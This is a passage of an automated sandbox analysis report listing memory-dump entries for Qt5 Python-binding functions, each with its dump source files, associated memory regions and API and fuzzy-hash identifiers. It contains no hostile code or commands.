                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?tokenString@QXmlStreamReader@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFB02F3E338
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?tokenReader@@StreamString@String@@malloc
                                                                                                                                                                                                                • String ID: QXmlStreamReader$tokenString$tokenString(self) -> str
                                                                                                                                                                                                                • API String ID: 776007299-3680606460
                                                                                                                                                                                                                • Opcode ID: f647037777f51dcb5caae96f59d2ad4539f26b9be7327996019bacd799dc00ae
                                                                                                                                                                                                                • Instruction ID: 2989c03eb61cc0ba5dc1191149af83d6419111f0359f9dbd5e3a0a5d676534f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f647037777f51dcb5caae96f59d2ad4539f26b9be7327996019bacd799dc00ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC1105B6A19A86C1EB40DF65E85CBA933A4FB88B80F994032CA5D17320EF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_
                                                                                                                                                                                                                • String ID: QTime$msecsSinceStartOfDay$msecsSinceStartOfDay(self) -> int
                                                                                                                                                                                                                • API String ID: 2938811853-1931342987
                                                                                                                                                                                                                • Opcode ID: 4f73d69cdda66515c58e1d7cf8cc0b1e893c9064dca98b7c4c168f67ef2ebcd4
                                                                                                                                                                                                                • Instruction ID: cf3e3130bc4b2f077cace1d43e0cb8101f33b7a5f2d9540959f91b5880cc78dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f73d69cdda66515c58e1d7cf8cc0b1e893c9064dca98b7c4c168f67ef2ebcd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C0192B6A05B46C2DB00CF74E88C9A833A4FB48B51B994532CA5D13360DF7CD559C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setNumberPrecision@RealStream@@Text
                                                                                                                                                                                                                • String ID: QTextStream$setRealNumberPrecision$setRealNumberPrecision(self, precision: int)
                                                                                                                                                                                                                • API String ID: 943475518-486622216
                                                                                                                                                                                                                • Opcode ID: 2836e2342288477ec70ef6f1ffab268189ce1f4ec4ac1a4a475ffeb43607a941
                                                                                                                                                                                                                • Instruction ID: abde7a7581627e70e2d8e249e1acdf7da330acd3341216c29afdb881c709275f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2836e2342288477ec70ef6f1ffab268189ce1f4ec4ac1a4a475ffeb43607a941
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1511E5B5A19E4AC1DB40DF24E888BA933A5FB48B84F994132CA4D53320EF7ED559C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setNamespaceProcessing@QXmlStreamReader@@QEAAX_N@Z.QT5CORE ref: 00007FFB02F3E498
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setNamespaceProcessing@Reader@@Stream
                                                                                                                                                                                                                • String ID: QXmlStreamReader$setNamespaceProcessing$setNamespaceProcessing(self, a0: bool)
                                                                                                                                                                                                                • API String ID: 3147142844-1697696842
                                                                                                                                                                                                                • Opcode ID: d2c9f19c51b34fc81942b2e02b0bd0eb55a88e564c20629567b946cb546f8004
                                                                                                                                                                                                                • Instruction ID: 485373558a6508e91683e9e37e8dd3e035478d33f3f071c593558a65facc4f3d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c9f19c51b34fc81942b2e02b0bd0eb55a88e564c20629567b946cb546f8004
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 241103B6A19E46C1EB00DF25E888AA833A5FB48B84F954032CA5C13330EE7DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?truncate@Array@@
                                                                                                                                                                                                                • String ID: QBitArray$truncate$truncate(self, pos: int)
                                                                                                                                                                                                                • API String ID: 2114817770-588427497
                                                                                                                                                                                                                • Opcode ID: 118f5bb2ff14f99dda48494df799fbe6efa0b66deffee5b3b4c6df63a8a52b05
                                                                                                                                                                                                                • Instruction ID: 79991dfb211bdb70a42cbb4e0fed06989288fbc46365c53792f8cdd83aa735c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 118f5bb2ff14f99dda48494df799fbe6efa0b66deffee5b3b4c6df63a8a52b05
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A41115B6A19E4AC1DB00DF24E888BA933A5FB48B84FA50132CA4D13324DF7DD959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setDateFromOffsetTime@@Utc@
                                                                                                                                                                                                                • String ID: QDateTime$setOffsetFromUtc$setOffsetFromUtc(self, offsetSeconds: int)
                                                                                                                                                                                                                • API String ID: 1633556954-4182505229
                                                                                                                                                                                                                • Opcode ID: a8bbb4b588d120ee329313a80afdf40ef03f37bc4c8b9215bf6d09b9bc5dd801
                                                                                                                                                                                                                • Instruction ID: 52ed156e693748fbde413cf1aba9ec59f88946ef7a85a9be214be00de18fc9d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8bbb4b588d120ee329313a80afdf40ef03f37bc4c8b9215bf6d09b9bc5dd801
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 621118B5A19E46C1DB00DF25E888BA833B5FB48B84FA54132CA5C13320DF7DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?parent@Object@@
                                                                                                                                                                                                                • String ID: QAbstractTableModel$parent$parent(self) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 636181259-1453074931
                                                                                                                                                                                                                • Opcode ID: c20d5c192a1de0616d9d186a2a1e89cef57332aacb69c15b7a88086ef9c1b874
                                                                                                                                                                                                                • Instruction ID: 5e71c985548504c13144a37c46290b4c1dd0181a2244a386ce479c06bb73eed5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c20d5c192a1de0616d9d186a2a1e89cef57332aacb69c15b7a88086ef9c1b874
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51012DB5A09A8681DB40DF25E848BA933A4FB48B84F994032C94D53730DF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?instance@Loader@@Object@@Plugin
                                                                                                                                                                                                                • String ID: QPluginLoader$instance$instance(self) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 1672285455-1279581167
                                                                                                                                                                                                                • Opcode ID: 5bbe2769b9b45840aae73a205a2815ea16a41de5d1abf08f9eba8babcd3e06da
                                                                                                                                                                                                                • Instruction ID: a293030d61664bbd339a439dd7284acc10b20316cc133927cfe6765903e3343a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bbe2769b9b45840aae73a205a2815ea16a41de5d1abf08f9eba8babcd3e06da
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D20129B5A08A8681EF40DF25EC4CBA933A4FB48B80F9A5032CA8D57720DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?error@Error@1@ProcessProcess@@
                                                                                                                                                                                                                • String ID: QProcess$error$error(self) -> QProcess.ProcessError
                                                                                                                                                                                                                • API String ID: 487065467-1765553606
                                                                                                                                                                                                                • Opcode ID: a14a5f7a4f9e0135b1ed0a6a9e35dbc280baccc8558c683bebfa4b32e681f83c
                                                                                                                                                                                                                • Instruction ID: b3a6e78c2d8ef7632b40016ebeacad8337a7649d3a61489cc9074ed0fece12c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a14a5f7a4f9e0135b1ed0a6a9e35dbc280baccc8558c683bebfa4b32e681f83c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C01E9B5A09A4681DF40DF75E888BA933B4FB88B84F994032CA5D53320DF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
